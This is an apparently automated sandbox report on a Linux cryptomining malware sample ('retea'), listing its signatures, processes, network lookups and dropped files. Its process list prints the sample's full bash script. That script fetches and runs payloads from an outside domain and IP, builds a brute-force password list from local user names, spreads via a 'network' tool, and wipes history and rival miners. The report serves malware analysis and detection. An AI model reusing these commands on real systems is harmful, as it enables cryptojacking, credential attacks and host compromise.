Malware Analysis Report

2025-01-02 07:00

Sample ID 241122-wn7zcs1mfl
Target retea
SHA256 061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191
Tags
upx xmrig_linux defense_evasion discovery miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

061f2562bf4ad2db25f218e218920aece057024cd2c8826c87f65acc29583191

Threat Level: Known bad

The file retea was found to be: Known bad.

Malicious Activity Summary

upx xmrig_linux defense_evasion discovery miner

Xmrig_linux family

xmrig

File and Directory Permissions Modification

Enumerates running processes

UPX packed file

Reads CPU attributes

Reads runtime system information

Writes file to shm directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-22 18:05

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-22 18:05

Reported

2024-11-22 18:09

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

57s

Max time network

147s

Command Line

[/tmp/retea]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /dev/shm/.x/network N/A
N/A N/A /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1564/cmdline /usr/bin/pkill N/A
File opened for reading /proc/207/stat /usr/bin/killall N/A
File opened for reading /proc/99/status /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/1053/cmdline /usr/bin/pkill N/A
File opened for reading /proc/499/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1280/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1372/cmdline /usr/bin/pkill N/A
File opened for reading /proc/263/stat /usr/bin/killall N/A
File opened for reading /proc/97/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1107/stat /usr/bin/killall N/A
File opened for reading /proc/92/status /usr/bin/pkill N/A
File opened for reading /proc/1013/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1162/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1566/status /usr/bin/pkill N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A
File opened for reading /proc/1165/status /usr/bin/pkill N/A
File opened for reading /proc/411/cmdline /usr/bin/pkill N/A
File opened for reading /proc/26/status /usr/bin/pkill N/A
File opened for reading /proc/195/cmdline /usr/bin/pkill N/A
File opened for reading /proc/91/stat /usr/bin/killall N/A
File opened for reading /proc/213/status /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/1310/stat /usr/bin/killall N/A
File opened for reading /proc/79/cmdline /usr/bin/pkill N/A
File opened for reading /proc/94/cmdline /usr/bin/pkill N/A
File opened for reading /proc/209/cmdline /usr/bin/pkill N/A
File opened for reading /proc/85/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1204/stat /usr/bin/killall N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1254/status /usr/bin/pkill N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/79/status /usr/bin/pkill N/A
File opened for reading /proc/1062/cmdline /usr/bin/pkill N/A
File opened for reading /proc/992/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1088/status /usr/bin/pkill N/A
File opened for reading /proc/21/cmdline /usr/bin/pkill N/A
File opened for reading /proc/665/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1098/status /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/588/stat /usr/bin/killall N/A
File opened for reading /proc/1228/stat /usr/bin/killall N/A
File opened for reading /proc/75/cmdline /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/1280/stat /usr/bin/killall N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/716/status /usr/bin/pkill N/A
File opened for reading /proc/586/status /usr/bin/pkill N/A
File opened for reading /proc/411/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1053/cmdline /usr/bin/pkill N/A
File opened for reading /proc/215/stat /usr/bin/killall N/A
File opened for reading /proc/1285/cmdline /usr/bin/pkill N/A
File opened for reading /proc/845/cmdline /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/679/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/rm N/A

Writes file to shm directory

Description Indicator Process Target
File opened for modification /dev/shm/.x/pass /bin/bash N/A
File opened for modification /dev/shm/.x/i /bin/bash N/A
File opened for modification /dev/shm/.x/bios.txt /bin/bash N/A
File opened for modification /dev/shm/.x/.usrs /bin/bash N/A

Processes

/tmp/retea

[/tmp/retea]

/bin/bash

[/tmp/retea -c exec '/tmp/retea' "$@" /tmp/retea]

/tmp/retea

[/tmp/retea]

/bin/bash

[/tmp/retea -c #!/bin/bash key=$1 user=$2 if [[ $key == "KOFVwMxV7k7XjP7fwXPY6Cmp16vf8EnL54650LjYb6WYBtuSs3Zd1Ncr3SrpvnAU" ]] then echo -e "" else echo Logged with successfully. rm -rf .retea crontab -r ; pkill xrx ; pkill haiduc ; pkill blacku ; pkill xMEu ; cd /var/tmp ; rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp ; mkdir /tmp/.tmp ; pkill Opera ; rm -rf xmrig .diicot .black Opera ; rm -rf .black xmrig.1 ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ; wget -q dinpasiune.com/payload || curl -O -s -L dinpasiune.com/payload || wget80.76.51.5/payload || curl -O -s -L80.76.51.5/payload ; chmod +x * ; ./payload >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history chmod +x .teaca ; ./.teaca > /dev/null 2>&1 ; history -c ; rm -rf .bash_history ~/.bash_history fi rm -rf /etc/sysctl.conf ; echo "fs.file-max = 2097152" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999 cd /dev/shm mkdir /dev/shm/.x > /dev/null 2>&1 mv network .x/ cd .x rm -rf retea ips iptemp ips iplist sleep 1 rm -rf pass useri=`cat /etc/passwd |grep -v nologin |grep -v false |grep -v sync |grep -v halt|grep -v shutdown|cut -d: -f1` echo $useri > .usrs pasus=.usrs check=`grep -c . .usrs` for us in $(cat $pasus) ; do printf "$us $us\n" >> pass printf "$us $us"$us"\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us 123456\n">> pass printf "$us 1\n">> pass printf "$us 12\n">> pass printf "$us 123\n">> pass printf "$us 1234\n">> pass printf "$us 12345\n">> pass printf "$us 12345678\n">> pass printf "$us 123456789\n">> pass printf "$us 123.com\n">> pass printf "$us 123456.com\n">> pass printf "$us 123\n" >> pass printf "$us 1qaz@WSX\n" >> pass printf "$us "$us"@123\n" >> pass printf "$us "$us"@1234\n" >> pass printf "$us "$us"@123456\n" >> pass printf "$us "$us"123\n" >> pass printf "$us "$us"1234\n" >> pass printf "$us "$us"123456\n" >> pass printf "$us qwer1234\n" >> pass printf "$us 111111\n">> pass printf "$us Passw0rd\n" >> pass printf "$us P@ssw0rd\n" >> pass printf "$us qaz123!@#\n" >> pass printf "$us !@#\n" >> pass printf "$us password\n" >> pass printf "$us Huawei@123\n" >> pass done wait sleep 0.5 cat bios.txt | sort -R | uniq | uniq > i cat i > bios.txt ./network "rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history" sleep 25 function Miner { rm -rf /dev/shm/retea /dev/shm/.magic ; rm -rf /dev/shm/.x ~/retea /tmp/kuak /tmp/diicot /tmp/.diicot ; rm -rf ~/.bash_history history -c } Miner /tmp/retea]

/usr/bin/rm

[rm -rf .retea]

/usr/bin/crontab

[crontab -r]

/usr/bin/pkill

[pkill xrx]

/usr/bin/pkill

[pkill haiduc]

/usr/bin/pkill

[pkill blacku]

/usr/bin/pkill

[pkill xMEu]

/usr/bin/rm

[rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp]

/usr/bin/mkdir

[mkdir /tmp/.tmp]

/usr/bin/pkill

[pkill Opera]

/usr/bin/rm

[rm -rf xmrig .diicot .black Opera]

/usr/bin/rm

[rm -rf .black xmrig.1]

/usr/bin/pkill

[pkill cnrig]

/usr/bin/pkill

[pkill java]

/usr/bin/killall

[killall java]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/killall

[killall cnrig]

/usr/bin/killall

[killall xmrig]

/usr/bin/wget

[wget -q dinpasiune.com/payload]

/usr/bin/curl

[curl -O -s -L dinpasiune.com/payload]

/var/tmp/wget80.76.51.5/payload

[wget80.76.51.5/payload]

/usr/bin/curl

[curl -O -s -L80.76.51.5/payload]

/usr/bin/chmod

[chmod +x systemd-private-9faebdbd91c94f559bb8c94d92724182-ModemManager.service-lAvep9 systemd-private-9faebdbd91c94f559bb8c94d92724182-colord.service-uYapRX systemd-private-9faebdbd91c94f559bb8c94d92724182-power-profiles-daemon.service-15dHNu systemd-private-9faebdbd91c94f559bb8c94d92724182-switcheroo-control.service-NtnwxA systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-logind.service-1kK5cw systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-oomd.service-zbT20I systemd-private-9faebdbd91c94f559bb8c94d92724182-systemd-resolved.service-1E39rf systemd-private-9faebdbd91c94f559bb8c94d92724182-upower.service-tRdU3B]

/usr/bin/rm

[rm -rf .bash_history /root/.bash_history]

/var/tmp/payload

[./payload]

/usr/bin/chmod

[chmod +x .teaca]

/var/tmp/.teaca

[./.teaca]

/usr/bin/rm

[rm -rf .bash_history /root/.bash_history]

/usr/bin/rm

[rm -rf /etc/sysctl.conf]

/usr/sbin/sysctl

[sysctl -p]

/usr/bin/mkdir

[mkdir /dev/shm/.x]

/usr/bin/mv

[mv network .x/]

/usr/bin/rm

[rm -rf retea ips iptemp ips iplist]

/usr/bin/sleep

[sleep 1]

/usr/bin/rm

[rm -rf pass]

/usr/bin/grep

[grep -v halt]

/usr/bin/grep

[grep -v sync]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep -v shutdown]

/usr/bin/grep

[grep -v false]

/usr/bin/grep

[grep -v nologin]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep -c . .usrs]

/usr/bin/cat

[cat .usrs]

/usr/bin/sleep

[sleep 0.5]

/usr/bin/uniq

[uniq]

/usr/bin/sort

[sort -R]

/usr/bin/uniq

[uniq]

/usr/bin/cat

[cat bios.txt]

/usr/bin/cat

[cat i]

/dev/shm/.x/network

[./network rm -rf /var/tmp/Documents ; mkdir /var/tmp/Documents 2>&1 ; crontab -r ; chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; cd /var/tmp ; chattr -iae /var/tmp/Documents/.diicot ; pkill Opera ; pkill cnrig ; pkill java ; killall java ; pkill xmrig ; killall cnrig ; killall xmrig ;cd /var/tmp/; mv /var/tmp/diicot /var/tmp/Documents/.diicot ; mv /var/tmp/kuak /var/tmp/Documents/kuak ; cd /var/tmp/Documents ; chmod +x .* ; /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history ; cd /tmp/ ; wget -q 80.76.51.5/.NzJjOTYwxx5/.balu || curl -O -s -L 80.76.51.5/.NzJjOTYwxx5/.balu ; mv .balu cache ; chmod +x cache ; ./cache >/dev/null 2>&1 & disown ; history -c ; rm -rf .bash_history ~/.bash_history]

/usr/bin/sleep

[sleep 25]

/usr/bin/rm

[rm -rf /dev/shm/retea /dev/shm/.magic]

/usr/bin/rm

[rm -rf /dev/shm/.x /root/retea /tmp/kuak /tmp/diicot /tmp/.diicot]

/usr/bin/rm

[rm -rf /root/.bash_history]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 1.1.1.1:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 bashupload.com udp
US 8.8.8.8:53 bashupload.com udp
DE 116.203.186.178:80 bashupload.com tcp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp
US 8.8.8.8:53 dinpasiune.com udp

Files

memory/1566-1-0x0000000000400000-0x00000000006c3d18-memory.dmp

memory/1566-2-0x0000000000400000-0x00000000006c3d18-memory.dmp

/dev/shm/.x/.usrs

MD5 193fbe42d4ec68ee592f790558a6b2a2
SHA1 1e71a73294e1a6cabf1c87d4241e4ed2e672879e
SHA256 6f67376894c0041f09a2128653255533724c15151006bb153e7cab389f2ff6d1
SHA512 c70248c473a9782eed317792fd8535b6674be9967cdc9450c61dc16354dbf81a1e015cc3321ebb15c3c2fdab378f4ce29e9e4f15a7cf2c1e4ba351031fba7bd6

/dev/shm/.x/pass

MD5 8098791106f621a1139c64db9e6b8604
SHA1 43b301e1e9d987c85896bea1368ef3d2fab7bb99
SHA256 2f97a866a83e4b4e086aaaffa38f0ef0279f20a333f40bdb07f3401a5ce81fe1
SHA512 e3c0415f91da102dcb1cb63fcc09cab89d08ad373cb83b48bd2f134b1e7ebc87ce20228e005735cf00e268f2f69b8de114f5ddf00de34dc40931251460487bc4

/dev/shm/.x/pass

MD5 76723d6902d4634e5c05b3622130f880
SHA1 fd0a01f2a4c57a93356e97ca54776548df682da0
SHA256 771113db09bddf605b93389525f97b4d72e8b3187b75a2cf36884938e5ca3291
SHA512 a7467f8eb5b6c3c18aa7206fed5e1645305aa828afc0368e9dd1363b13b190a53edfeda371226c041596c004dda808e173647996757474d54015c0fa81a98670

/dev/shm/.x/pass

MD5 dc96666f8a529179a201af92383360ea
SHA1 6baaba36e42373b0c8b36657d84225820b02c018
SHA256 de890c75210a94e89ee7883d28f94a6f3481ce89f6fb6e56c06f05391a438b79
SHA512 c58a22420020327de96491e3f7be282c339670442196a3dd94cd700d6214cbcff6dfea68e5418bb5c0cac983885ac4e85a44ac08917c2a7d077b812b7efbd760

/dev/shm/.x/pass

MD5 0ef6d2e7604d35dd9411089bbb1942ba
SHA1 f5a8646033c5df1a6ac820d93283d7314da4f16a
SHA256 0b2c4e44393449ec5c5184282d7790aa4fb2218085449e359816916553375ae7
SHA512 625e18753b45ad17eaf8c37213db85c9371cce7c43a822492821b6e6434f0a291ee06185bba08b41c5a51759a58c99779b765cdc38aa76f831900d5fb8c61e5f

/dev/shm/.x/pass

MD5 534c18fea42e4d4ee6821592f118fc12
SHA1 32aa842a6f8815cd3b571b0e070cd681d635a6de
SHA256 9f7ef656b1d8ed7c046d3ca49bb523b981baee7742669d7790fce5a6381254c8
SHA512 622c643a9c9e41b18b99f54eac1723332ae7bd26d42105747951e578c55be5fc2338879fd79a9008df6f6e7f69a4e203104998fe8f48ff53fddd675f209bfa90

/dev/shm/.x/pass

MD5 3059976a246142a1997b6ce328dbe4cf
SHA1 3794c3c89504f72068626242b4447f2e7912a8c5
SHA256 bbd8c4db89a96f9bbd8b0bbf9968c3ffa011f1d16c28d11b8450ae238f2bbd2b
SHA512 2514fb4cd73ef16d488c138f2dad8e55a48d3597ceade88e7a73762b3e1a6c652e30a31b1769de651433004e538c58ce0ab04b936e279598fad848e9c4460fbf